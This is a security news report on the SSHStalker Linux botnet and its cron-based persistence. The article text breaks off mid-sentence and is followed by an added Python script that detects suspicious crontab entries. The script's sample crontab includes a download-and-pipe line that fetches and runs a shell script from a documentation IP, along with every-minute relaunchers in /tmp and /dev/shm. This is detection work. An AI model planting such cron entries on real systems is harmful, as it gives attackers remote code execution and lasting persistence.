SSHStalker botnet targets Linux servers with legacy exploits and SSH scanning

https://securityaffairs.com/187833/malware/sshstalker-botnet-targets-linux-servers-with-legacy-exploits-and-ssh-scanning.html

Publish Date: 2026-02-11 05:08:00

Source Domain: securityaffairs.com

Pierluigi Paganini
February 11, 2026

A new Linux botnet, SSHStalker, has infected about 7,000 systems using old 2009-era exploits, IRC bots, and mass-scanning malware.

Flare researchers uncovered a previously undocumented Linux botnet dubbed SSHStalker, observed via SSH honeypots over two months. Researchers ran an SSH honeypot with weak credentials starting in early 2026 and spotted a set of intrusions unlike any previously reported activity. After checking threat intel databases, vendor reports, and malware repositories, they confirmed this activity as new and named it SSHStalker. The botnet combines old-school 2009-era IRC botnet tactics with modern automated mass-compromise techniques.

“We’ve designated this operation ‘SSHStalker’ due to its distinctive behavior: the botnet maintained persistent access without executing any observable impact operations, despite having in its arsenal capabilities to launch DDoS attacks and conduct cryptomining.” reads the report published by Flare. “This ‘dormant persistence’ pattern—infecting systems and establishing control without immediate monetization—differentiates it from typical opportunistic botnet operations and suggests either infrastructure staging, testing phases, or strategic access retention for future use.”

SSHStalker relies on IRC as its command-and-control backbone, using multiple C-based bots, Perl scripts, and known malware families like Tsunami and Keiten. Attacks are highly automated, chaining SSH scanners with rapid staging, on-host compilation, and automatic enrollment into IRC channels to scale infections quickly.

The researchers pointed out that the persistence mechanism implemented by the botnet is noisy but effective, using cron jobs that relaunch the malware within about a minute if disrupted. The toolkit mixes log…
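As an added detection example (not code from Flare's report or the article), the script below flags crontab entries that behave like the watchdog-style relauncher described above: every-minute schedules, jobs launched from world-writable or hidden directories, and download-and-pipe commands. The sample crontab and the 198.51.100.23 address are constructed for illustration.

```python
import re

# Constructed sample crontab (not from Flare's report): benign jobs beside the kind of
# every-minute relauncher described above. 198.51.100.23 is a TEST-NET-2 documentation address.
SAMPLE_CRONTAB = """\
0 3 * * * /usr/bin/certbot renew --quiet
* * * * * /tmp/.x/update >/dev/null 2>&1
*/1 * * * * cd /dev/shm && ./bot
@hourly /usr/local/bin/backup.sh
*/5 * * * * wget -q -O- http://198.51.100.23/s.sh | sh
"""

WRITABLE_DIR = re.compile(r"(?<![\w/])(?:/tmp|/var/tmp|/dev/shm)(?:/|\b)")
HIDDEN_PATH = re.compile(r"/\.[A-Za-z0-9_-]+")  # e.g. /tmp/.x (heuristic; also hits ~/.local)
DOWNLOAD_PIPE = re.compile(r"\b(?:curl|wget)\b.*\|\s*(?:sh|bash)\b")

def parse_entry(line):
    """Return (schedule, command), or None for blank, comment and VAR=value lines."""
    line = line.strip()
    if not line or line.startswith("#"):
        return None
    if line.startswith("@"):  # @reboot, @hourly, ... use a single schedule token
        parts = line.split(None, 1)
        return parts[0], (parts[1] if len(parts) > 1 else "")
    parts = line.split(None, 5)  # five time fields, then the command
    return (" ".join(parts[:5]), parts[5]) if len(parts) == 6 else None

def runs_every_minute(schedule):
    """True for '* * * * *' or '*/1 * * * *': a job that re-fires within a minute."""
    minute, *rest = schedule.split()
    return minute in ("*", "*/1") and len(rest) == 4 and all(f == "*" for f in rest)

RULES = [  # (predicate over (schedule, command), reason reported)
    (lambda s, c: runs_every_minute(s), "every-minute schedule (watchdog-style relaunch)"),
    (lambda s, c: bool(WRITABLE_DIR.search(c)), "runs from /tmp, /var/tmp or /dev/shm"),
    (lambda s, c: bool(HIDDEN_PATH.search(c)), "hidden path component"),
    (lambda s, c: bool(DOWNLOAD_PIPE.search(c)), "downloads and pipes into a shell"),
]

def scan_crontab(text):
    """Return one {'schedule', 'command', 'reasons'} dict per entry that trips a rule."""
    findings = []
    for schedule, command in filter(None, map(parse_entry, text.splitlines())):
        reasons = [why for hit, why in RULES if hit(schedule, command)]
        if reasons:
            findings.append({"schedule": schedule, "command": command, "reasons": reasons})
    return findings
```

In practice, feed `scan_crontab` the contents of /etc/crontab, each file in /etc/cron.d, and the per-user crontabs under /var/spool/cron, and review every flagged entry against the process it launches.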
